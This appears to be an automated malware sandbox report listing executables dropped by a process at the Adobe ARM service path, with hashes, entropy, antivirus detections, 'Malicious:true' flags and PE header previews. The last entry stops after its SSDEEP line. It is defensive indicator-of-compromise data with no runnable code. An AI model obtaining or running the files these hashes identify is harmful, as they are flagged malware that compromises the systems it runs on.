                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1498112
                                                                                                                                                        Entropy (8bit):4.895423347206931
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:d16DmRF+wpx/Qaf6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EmRF+wn/Jf6LNiXicJFFRGNzj3
                                                                                                                                                        MD5:B1C8B9524B94045FD35E09CE488A6FD4
                                                                                                                                                        SHA1:60A0D7043ED5025F0F031530D9C7896FEF3839F7
                                                                                                                                                        SHA-256:E6C1ABAA7C89D38FC18E3F898E4413A8058C57E6009B50C92B23E10789829A86
                                                                                                                                                        SHA-512:9C940D6CA0A35D3032381C42895A677B91B2D9769627F90CA1ADFBF42AE492CFFF1A6AB52BCFBDB80CA47B6028911362312296B8B4585D0C4C6317984ED1F727
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!......O...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                        Entropy (8bit):4.680826674653128
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:DE21BPE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:A2bMLNiXicJFFRGNzj3
                                                                                                                                                        MD5:D2B2A1B6A9573C02C4F2F0BEDB4A62D7
                                                                                                                                                        SHA1:43AC25ACFB81D2BE82D2B84391FA411E494782D6
                                                                                                                                                        SHA-256:C37F6E54B032E58421D250A2B228AFEC149701788840C3C54278213E3DF8DCA3
                                                                                                                                                        SHA-512:0F797FB81CD0D6707107845327F124B58F11DD64B316D2E4C509210B2B4FEDA81AD0DF9E934460551B595F04965B2D0E7EEA49CA09F98F4881C0FBC42B8A615F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4877824
                                                                                                                                                        Entropy (8bit):7.996670972014671
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:n6HFftsBuLnimh3Q/85ICWcV/2ZNGQMv7wRGpj3:eGBg/3QU5tPmKF9
                                                                                                                                                        MD5:308A8D244025FAA76F84EA6C85792A96
                                                                                                                                                        SHA1:D6D3057E9A6D6C986CB95FBD03B3B13BE1EACE30
                                                                                                                                                        SHA-256:9B9836374308EEA92CCCE616B8A2BE54355981613C56BE8A49038771417425C4
                                                                                                                                                        SHA-512:0445B37D2298F17F97872D6498939F53A11018CD5E709440830E5BBD73BCA913D58F22077592B41076499ADC8610E6876CB89F0DFD11EC01397BE84C6469E68F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.......J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4877824
                                                                                                                                                        Entropy (8bit):7.996671012752916
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:66HFftsBuLnimh3Q/85ICWcV/2ZNGQMv7wRGpj3:FGBg/3QU5tPmKF9
                                                                                                                                                        MD5:F9F2C5C126BD648451EE81D2E3F40716
                                                                                                                                                        SHA1:41288EF2C87CE917E3D395CC3EDB1F81F200EDD9
                                                                                                                                                        SHA-256:0987EE8E570072029153E60A460807BC9056CF94FD30A381068781A34FA0E9CF
                                                                                                                                                        SHA-512:A39ED58E254D6F40789BCC880A33F14F1DBBCA4CAB1099776F11BF359F44EE312049DB846F4C1565A591EFE8881CE9ADFCEC8CA417856118CDA318F5208B6D9C
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J......%K... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1313792
                                                                                                                                                        Entropy (8bit):4.567740119975528
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:7WiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:7g/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:691AC15569FF21CC8AC09C2233FC5CD4
                                                                                                                                                        SHA1:AC86B7AC3C38588F107D99AE5F62E3F39B05E36E
                                                                                                                                                        SHA-256:DD7592F7C1A119E6057E87CEC7989F90B8C233793061FB5D3C8736C04C298F86
                                                                                                                                                        SHA-512:68854D8DF919B36F1A0722BC56B74DFEF9A2B34254BC16D5C6C62EFA7F622FB00E303D8AFF9021524FC2225B15D0E8FD72BE7C2B2E1A5AB4D458A721B61F7F34
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.528842403078578
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:U2DiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:N3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:EFE02827E709A6330F51D959745C169A
                                                                                                                                                        SHA1:6D9373AC57A256F5CCB68E35C2000417990F8194
                                                                                                                                                        SHA-256:4E1FD8C2311FADE89A055C4B61476A2F0F29097086C26BF48B33FDD3BA4C99D3
                                                                                                                                                        SHA-512:0F017B1277ECDD4BF352F0E41BB8E47C0638EF4E64568B0B6B2BC3EE808EBB3A2B93C348DAFEDC985A3BD29BF6BB38C30BFB12F87ADCB042ECE42035C8670D6F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                        Entropy (8bit):4.9949024081212405
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qpwOtO7y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qmOtmyLNiXicJFFRGNzj3
                                                                                                                                                        MD5:19781A03323B4189170AFC0FBC04258D
                                                                                                                                                        SHA1:FA9BDCD3DE04AE38F614FE77F6C2774C76E556E1
                                                                                                                                                        SHA-256:C383492F69FF12D8765EFFF9718062D9AD5907530F96124AA823030B30DD4DC5
                                                                                                                                                        SHA-512:3CD26EDDE3B4A4C4A25E35B274B4B50A8099F00FF2DB40A46C97177F90F753AD1499C7AF2E84F82A51FB0ACFD445F1BB952B08BF001A769A6FFBD7B54C9CF57A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1368064
                                                                                                                                                        Entropy (8bit):4.635811328290664
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:q1b/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qhLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E4B713A00447FEBBE949642BA8EB627F
                                                                                                                                                        SHA1:222D7B2713499A7CC2955796D7F0AA5E787B0C70
                                                                                                                                                        SHA-256:51B58D4F607CA14EF9EB8F57D881795EFDA4DB8A14EF3084956734FC7A3D531C
                                                                                                                                                        SHA-512:A11B64E311F9EF7CA400B0569E3C6D1FF1CB33EDF67CF4BE4409B49DA7F2ACD80E2833EB93DB22A128D55C449697E0994314CBB80EA0029466A1E15F8164732F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................&......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                        Entropy (8bit):4.99557910643216
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:VKU/h/4KF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Vr/VFLNiXicJFFRGNzj3
                                                                                                                                                        MD5:5A1F4E1DC62537BBB62CF2A3E307FEC7
                                                                                                                                                        SHA1:E309E143FD56C93A52548C0857794B3C1E632B0A
                                                                                                                                                        SHA-256:B3602CA27B40AE5147A018B24AC366D92F88B5EBB91049B121FDF4BD11358342
                                                                                                                                                        SHA-512:199ABD1F64A9D9C22815221AABE05FE9684FF282E8F080F497419170A1F46BFEA73D76833546E779DBF20FA4F945D4754F63F7F1E71056AF96526B5E007DE345
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....f6.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1669632
                                                                                                                                                        Entropy (8bit):5.069201485256786
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:vx7YiBLZ05jNTmJWEx+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vxUiHIjNg+LNiXicJFFRGNzj3
                                                                                                                                                        MD5:70F287FEE9BF7F273063892CF5EBFE29
                                                                                                                                                        SHA1:8DABD83677F2D955739A075CF8622274451B1D1B
                                                                                                                                                        SHA-256:01311F4D914F01D9BDD5B0D88A0FE83FA2B7EF677A95E6E854BF70E82BE9D3B7
                                                                                                                                                        SHA-512:D7D917AF4BCDF2DC18145C9E4A79C7933DBCCA96EF117A0B9760D7208115CCA44CB88C298543A98F7B097333345579F88819747119A3B267FDEB60B49EBA38CB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529296163154916
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:MorziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Hb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:BDCA14198E8AE6E20F18639F9289578B
                                                                                                                                                        SHA1:7465AC755F8975D580DFB000F401F9765776C0AA
                                                                                                                                                        SHA-256:B152B16F96122149FFF6E528818775F401BF6D9649C8DFB244ADAADD67763ADB
                                                                                                                                                        SHA-512:552ADF36984DC18474D0650EDA4AE802D34964D1AAE133ED06265F49EA6ED37A31384A8895706B0F60EE75A161525AB33D1B2CD5C1D619662A0A4570AF290ED6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................F.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1397760
                                                                                                                                                        Entropy (8bit):4.695175002386364
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:KdP/c/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eULNiXicJFFRGNzj3
                                                                                                                                                        MD5:B07931508FFAFBC7AD4E579E6D0C05BC
                                                                                                                                                        SHA1:4DA89F33AAEC0755194212B8C6568DE2DED3A5F9
                                                                                                                                                        SHA-256:943C694181D0CD70320339539C6CFD0848E4B6B894F678DFD1B5DFB64AEE882D
                                                                                                                                                        SHA-512:9818F428962BA8D84FED8A01983952EB09077E12B5C5EA8D548FB4D41E1FE896215BF8FEED3FE9135A8D487BA510101B459D44AEB66C2D6C56F862E2DB67EA01
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` .................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.52932402458222
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:RZ5biJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:/l/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:D2A77E5E0D23A8DC776755D2BF9B5107
                                                                                                                                                        SHA1:657D02DFBA16FB21C4AA70849C943607A03B46F1
                                                                                                                                                        SHA-256:EDEE5BFA5810BE2DEE1A757FCF52C5728A42C97982247D5F9D0CEA3BC44AA736
                                                                                                                                                        SHA-512:263F3F4F99A10FD40FE6F46D5215487A0268E63D6B78390976FD0B2DE85D6C00E07C3794129D7666D091193D3DF985A65EC0DB9FF21586BF445CBA8FE0227480
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................5........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529373195976775
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:sZlDiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:aJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:A2C4F81105BD59AA1C9606BBF828ABA4
                                                                                                                                                        SHA1:68102E36EDA7F67C881A1C29305EF1C878F838DA
                                                                                                                                                        SHA-256:7585638AE2E39AA8A194198061717B2FD2186E2F3179F88BE735192EB9B32A61
                                                                                                                                                        SHA-512:B758E674C7EB231BCB3D9E047E8D9D0838F1012B4F75D6A84E016080CC138EFE2CDC81752894C5FCE94C98F5E53436D98ABE56ED0D411C765D5478F407F908AB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................w.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529369711259298
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:4NlDiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:+J/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:3FEF8F4B51621D30D53555D15C2D64A5
                                                                                                                                                        SHA1:89B4DBA7AFED95B4436B6FAF07E466715554FB65
                                                                                                                                                        SHA-256:623C1920F901531C41386E6379EEEAF1FB2AFCE3C8A245F328272EB465DF0852
                                                                                                                                                        SHA-512:36876F6543863D72AC67C47F9436E587C46262B0BE549A383F6229056CB2C64F9DE6A9F7F06EB386400ECD114F45CB52362B848E7C7F2F13BC83CC0173AD2C6D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................v........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529358903292884
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:PmmjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:um/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:CDD4E69EF2BD06928CF04B03D703A27C
                                                                                                                                                        SHA1:FF9A9830CC0D1C5B5E7542D401A88553A79C4694
                                                                                                                                                        SHA-256:45B977A9ECBB6FE9169492496C9390C9BB599B6C29109F31DCACAEC4AC5ADC60
                                                                                                                                                        SHA-512:D0B569B99BEAEFAA0047ADAE86AB300A73E6BD71A66E74C92638953A8F37EB3F954FEB94A0670A1AC748E4B86E15A9750E8E94C4EE581C14AFE8553DA6B32FD9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................3........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.530189904541645
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:EnmPiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:+S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:34132076343ED3A982FDB46CB3A6F2AD
                                                                                                                                                        SHA1:0BED5D86F632880935F9999731FACE1F2765C611
                                                                                                                                                        SHA-256:7615CCCA7F74C8850EBFE859E0C4F8EB51122620E4910C8B02564F034DDEBAAF
                                                                                                                                                        SHA-512:4AC94A11AEA1FC5976CD9EDB9E8F4946FD618B998F0534D8EA9585BD8B28DABF50F477332CC98E4D2BDD2C3B3842172F5F9C7C2DD73E2E0463BE8C022D103C16
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.52933423809722
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:WT5biJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:G9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:C2DB1288A0E71FD0DE7903F8895B893E
                                                                                                                                                        SHA1:5DFE093622C594C1218234249375D2C01ECF7831
                                                                                                                                                        SHA-256:D210E123DC38065D380D19913095EB9C2732EEC12293EF5D5ED953FA9F55F795
                                                                                                                                                        SHA-512:C935EA72EDC4BB595429316CCE4A8C8D48E4869EF0328D78E1E4F228255BBB2BF1C15D65E01F983947EE803B114E969461034B027C708DC82A3874FC07322DE8
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.5293643584865375
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:6w/DiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:z//TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
